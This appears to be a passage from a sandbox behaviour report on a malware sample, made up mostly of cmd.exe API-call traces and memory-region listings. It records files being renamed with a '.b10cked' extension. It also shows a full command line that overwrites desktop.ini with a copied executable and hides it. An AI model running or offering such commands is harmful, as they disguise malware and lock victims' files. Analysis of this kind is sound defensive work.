returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0128.806] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0128.806] _wcsicmp (_String1="CFAWII~1.XLS", _String2=".") returned 53 [0128.806] _wcsicmp (_String1="CFAWII~1.XLS", _String2="..") returned 53 [0128.807] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\cfawii~1.xls")) returned 0x20 [0128.807] 
GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e20b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.807] SetErrorMode (uMode=0x0) returned 0x0 [0128.807] SetErrorMode (uMode=0x1) returned 0x0 [0128.807] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS", nBufferLength=0x104, lpBuffer=0x26ec84, lpFilePart=0x26ec6c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS", lpFilePart=0x26ec6c*="CFAWII~1.XLS") returned 0x3f [0128.807] SetErrorMode (uMode=0x0) returned 0x1 [0128.807] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1")) returned 0x10 [0128.807] _wcsicmp (_String1="CFAWII~1.XLS", _String2=".") returned 53 [0128.807] _wcsicmp (_String1="CFAWII~1.XLS", _String2="..") returned 53 [0128.807] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\cfawii~1.xls")) returned 0x20 [0128.807] SetErrorMode (uMode=0x0) returned 0x0 [0128.807] SetErrorMode (uMode=0x1) returned 0x0 [0128.807] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS", nBufferLength=0x104, lpBuffer=0x26f100, lpFilePart=0x26ee98 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS", lpFilePart=0x26ee98*="CFAWII~1.XLS") returned 0x3f [0128.807] SetErrorMode (uMode=0x0) returned 0x1 [0128.807] SetErrorMode (uMode=0x0) returned 0x0 [0128.807] SetErrorMode (uMode=0x1) returned 0x0 [0128.807] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x26f308, lpFilePart=0x26ee98 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf 
aWIIkKxWa7MD7fCc.xlsx.b10cked", lpFilePart=0x26ee98*="Cf aWIIkKxWa7MD7fCc.xlsx.b10cked") returned 0x53 [0128.807] SetErrorMode (uMode=0x0) returned 0x1 [0128.807] SetLastError (dwErrCode=0x0) [0128.808] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\cf awiikkxwa7md7fcc.xlsx.b10cked")) returned 0xffffffff [0128.808] GetLastError () returned 0x2 [0128.808] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x26e814, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e814) returned 0x2e22c0 [0128.808] FindNextFileW (in: hFindFile=0x2e22c0, lpFindFileData=0x26e814 | out: lpFindFileData=0x26e814) returned 0 [0128.808] GetLastError () returned 0x12 [0128.808] FindClose (in: hFindFile=0x2e22c0 | out: hFindFile=0x2e22c0) returned 1 [0128.809] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x2e1e50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e1e50) returned 0x2e22c0 [0128.810] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x26eaac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked", lpFilePart=0x0) returned 0x53 [0128.810] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx", nBufferLength=0x104, lpBuffer=0x26eaac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx", lpFilePart=0x0) returned 0x4b [0128.810] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\cf awiikkxwa7md7fcc.xlsx")) returned 0x20 [0128.810] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\cf awiikkxwa7md7fcc.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\cf awiikkxwa7md7fcc.xlsx.b10cked"), dwFlags=0x3) returned 1 [0128.810] FindClose (in: hFindFile=0x2e22c0 | out: hFindFile=0x2e22c0) returned 1 [0128.810] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ea60 | out: _Buffer=" 1") returned 9 [0128.810] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.810] GetFileType (hFile=0x7) returned 0x2 [0128.816] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0128.816] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26e9ec | out: lpMode=0x26e9ec) returned 1 [0128.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.816] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ea20 | out: lpConsoleScreenBufferInfo=0x26ea20) returned 1 [0128.816] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0128.816] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ea60 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0128.817] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26ea44, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ea44*=0x1a) 
returned 1 [0128.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.817] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.817] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0128.817] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.817] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0128.817] SetConsoleInputExeNameW () returned 0x1 [0128.817] GetConsoleOutputCP () returned 0x1b5 [0128.817] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.817] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.817] exit (_Code=0) Process: id = "88" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0x910" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] 
Region: id = 10740 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10741 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10742 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10743 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 10744 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10745 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10746 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10747 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10748 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10749 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10830 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10831 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10832 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10833 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 10834 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 10835 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10836 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10837 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10838 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10839 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10840 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10841 start_va = 0x76d70000 
end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10842 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10843 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10844 start_va = 0x440000 end_va = 0x507fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 10845 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10846 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10847 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 10848 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 10849 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 10850 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 10851 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 10852 start_va = 0x620000 end_va = 0x121ffff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 10853 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 10878 start_va = 0x1390000 end_va = 0x165efff entry_point = 0x1390000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 145 os_tid = 0x90c [0128.747] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afb64 | out: lpSystemTimeAsFileTime=0x2afb64*(dwLowDateTime=0x86ac6a20, dwHighDateTime=0x1d440a9)) [0128.747] GetCurrentProcessId () returned 0x910 [0128.747] GetCurrentThreadId () returned 0x90c [0128.747] GetTickCount () returned 0x293d5 [0128.747] QueryPerformanceCounter (in: lpPerformanceCount=0x2afb5c | out: lpPerformanceCount=0x2afb5c*=18553617288) returned 1 [0128.747] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0128.747] __set_app_type (_Type=0x1) [0128.747] __p__fmode () returned 0x76b331f4 [0128.748] __p__commode () returned 0x76b331fc [0128.748] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0128.748] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0128.748] GetCurrentThreadId () returned 0x90c [0128.748] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x90c) returned 0x38 [0128.748] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0128.748] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0128.748] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.748] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.748] RegOpenKeyExW 
(in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afaf4 | out: phkResult=0x2afaf4*=0x0) returned 0x2 [0128.748] VirtualQuery (in: lpAddress=0x2afb2b, lpBuffer=0x2afac4, dwLength=0x1c | out: lpBuffer=0x2afac4*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.748] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afac4, dwLength=0x1c | out: lpBuffer=0x2afac4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0128.748] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afac4, dwLength=0x1c | out: lpBuffer=0x2afac4*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0128.748] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afac4, dwLength=0x1c | out: lpBuffer=0x2afac4*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.748] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afac4, dwLength=0x1c | out: lpBuffer=0x2afac4*(BaseAddress=0x2b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0128.748] GetConsoleOutputCP () returned 0x1b5 [0128.748] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.749] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0128.749] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.749] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0128.749] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.749] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0128.749] _get_osfhandle (_FileHandle=1) 
returned 0x7 [0128.749] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.749] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.749] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0128.749] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.749] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0128.749] GetEnvironmentStringsW () returned 0x350590* [0128.750] FreeEnvironmentStringsW (penv=0x350590) returned 1 [0128.750] GetEnvironmentStringsW () returned 0x350590* [0128.750] FreeEnvironmentStringsW (penv=0x350590) returned 1 [0128.750] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aea64 | out: phkResult=0x2aea64*=0x40) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x0, lpData=0x2aea70*=0x40, lpcbData=0x2aea68*=0x1000) returned 0x2 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x1, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x0, lpData=0x2aea70*=0x1, lpcbData=0x2aea68*=0x1000) returned 0x2 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x0, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x40, lpcbData=0x2aea68*=0x4) 
returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x40, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x0, lpData=0x2aea70*=0x40, lpcbData=0x2aea68*=0x1000) returned 0x2 [0128.750] RegCloseKey (hKey=0x40) returned 0x0 [0128.750] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aea64 | out: phkResult=0x2aea64*=0x40) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x0, lpData=0x2aea70*=0x40, lpcbData=0x2aea68*=0x1000) returned 0x2 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x1, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x0, lpData=0x2aea70*=0x1, lpcbData=0x2aea68*=0x1000) returned 0x2 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x0, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x9, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, 
lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x4, lpData=0x2aea70*=0x9, lpcbData=0x2aea68*=0x4) returned 0x0 [0128.750] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aea6c, lpData=0x2aea70, lpcbData=0x2aea68*=0x1000 | out: lpType=0x2aea6c*=0x0, lpData=0x2aea70*=0x9, lpcbData=0x2aea68*=0x1000) returned 0x2 [0128.750] RegCloseKey (hKey=0x40) returned 0x0 [0128.750] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886363 [0128.750] srand (_Seed=0x5b886363) [0128.750] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h 